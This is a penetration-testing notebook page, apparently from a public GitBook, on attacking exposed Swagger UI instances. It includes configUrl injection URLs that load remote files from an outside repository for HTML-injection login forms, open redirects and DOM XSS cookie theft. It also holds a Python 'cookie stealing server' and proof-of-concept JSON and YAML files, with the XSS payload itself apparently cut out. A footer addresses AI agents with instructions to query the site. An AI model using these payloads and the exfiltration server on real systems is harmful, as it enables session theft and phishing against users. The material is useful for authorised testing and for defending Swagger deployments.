> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/swagger-ui.md). # Swagger UI [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Nuclei template {% embed url="" %} {% embed url="" %} ## Find Exposed Swagger {% embed url="" %} ### Wordlist ``` https://example.com/swagger.yaml https://example.com/swagger.json https://example.com/api-docs https://example.com/v2/api-docs (Swagger 2.0) https://example.com/v3/api-docs (OpenAPI 3) ``` {% embed url="" %} {% embed url="" %} ## OSINT {% embed url="" %} ## Audit endpoints {% embed url="" %} {% content-ref url="/pages/2nQo9jQkGanSbcZGflSg" %} [REST API](/0xss0rz/pentest/api/rest-api.md) {% endcontent-ref %} ### Burp Extension Parse OpenAPI documentation using the OpenAPI Parser BApp {% embed url="" %} ## Get versions and their vulnerabilities. {% embed url="" %}

## Find old versions of Swagger-ui vulnerable to various XSS attacks - XSSwagger {% embed url="" %} ## CVE-2018-25031 Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks. {% embed url="" %} {% embed url="" %} {% embed url="" %} Test: `/api/docs/?configUrl=https://jumpy-floor.surge.sh/test.json`

### Repo {% embed url="" %} Found Swagger try each of the file of the repo ``` # HTML Injection - Display a login form http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json # Phishing method - Open Redirect - If the victim click on evil.com http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json # DOM XSS http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.json http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json ``` ### Cookie Stealing Server with CORS Header ```python from http.server import SimpleHTTPRequestHandler import socketserver class CORSRequestHandler(SimpleHTTPRequestHandler): def end_headers(self): self.send_header('Access-Control-Allow-Origin', '*') self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS') super().end_headers() if name == "__main__": PORT = 80 with socketserver.TCPServer(("", PORT), CORSRequestHandler) as httpd: print("Serving at port", PORT) httpd.serve_forever() ``` POC: `test.json` ```json { "url": "http://IP/test.yaml", "urls": [ { "url": "http://IP/test.yaml", "name": "Foo" } ] } ``` POC: `test.yaml` ```yaml swagger: '2.0' info: title: XSS Attack BY 0xss0rz description: |

version: production
basePath: /JSSResource/
produces:
 - application/xml
 - application/json
consumes:
 - application/xml
 - application/json
security: - basicAuth: []
paths:
 /M0X0101:
  get:
   responses:
    '200':
     description: No response was specified
   tags: - XSS_D 
   operationId: findAccounts
   summary: Finds all accounts 
 '/hack/hachid/{id}':
  delete:
   parameters:
    - description: | format: int64 
      in: path 
      name: id 
      required: true 
      type: integer 
   responses:
    '200':
      description: No response was specified
``` Could lead to CSS exfiltration

{% embed url=" " %}

## Postman / Scanner

{% embed url=" " %}

```
http://url/swagger/docs/v1
http://url/ /v3/api-docs # JSON file
``` or check source code:

```
const ui = SwaggerUIBundle({
  url: "https://petstore.swagger.io/v2/swagger.json",     // <-------
  dom_id: '#swagger-ui',
```

or dev tool ```
curl -o swagger.yaml https://example.com/swagger.yaml
```

If the swagger is a json file use yq to convert it: `pip install yq` or `apt install yq`

```
curl -s https://example.com/swagger.json | yq -P > swagger.yaml
```

You can now import the yaml file inside Postman or use it in scanner like Zap

{% content-ref url="/pages/2epJFSpvZTi3PzvJB97N" %}
[Postman Usage](/0xss0rz/pentest/api/postman-usage.md)
{% endcontent-ref %}

{% content-ref url="/pages/AHF1GP3z6ljW1L4mI3XL" %}
[ZAP Scanner & other scanning methods](/0xss0rz/pentest/api/zap-scanner-and-other-scanning-methods.md)
{% endcontent-ref %}

### SOAPi

{% embed url=" " %}

### Other Scanners

{% content-ref url="/pages/xZjnSlrUOfBYRuPF4xUw" %}
[Tools & Scanners](/0xss0rz/pentest/api/tools-and-scanners.md)
{% endcontent-ref %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp) ## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**Hacking APIs: Breaking Web Application Programming Interfaces**](https://www.amazon.fr/dp/1718502443?tag=0xss0rz-21)\
  A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.
* [**Black Hat GraphQL: Attacking Next Generation APIs**](https://www.amazon.fr/dp/B0B7Q8BYG1?tag=0xss0rz-21)\
  This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/api/swagger-ui.md?ask= ```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.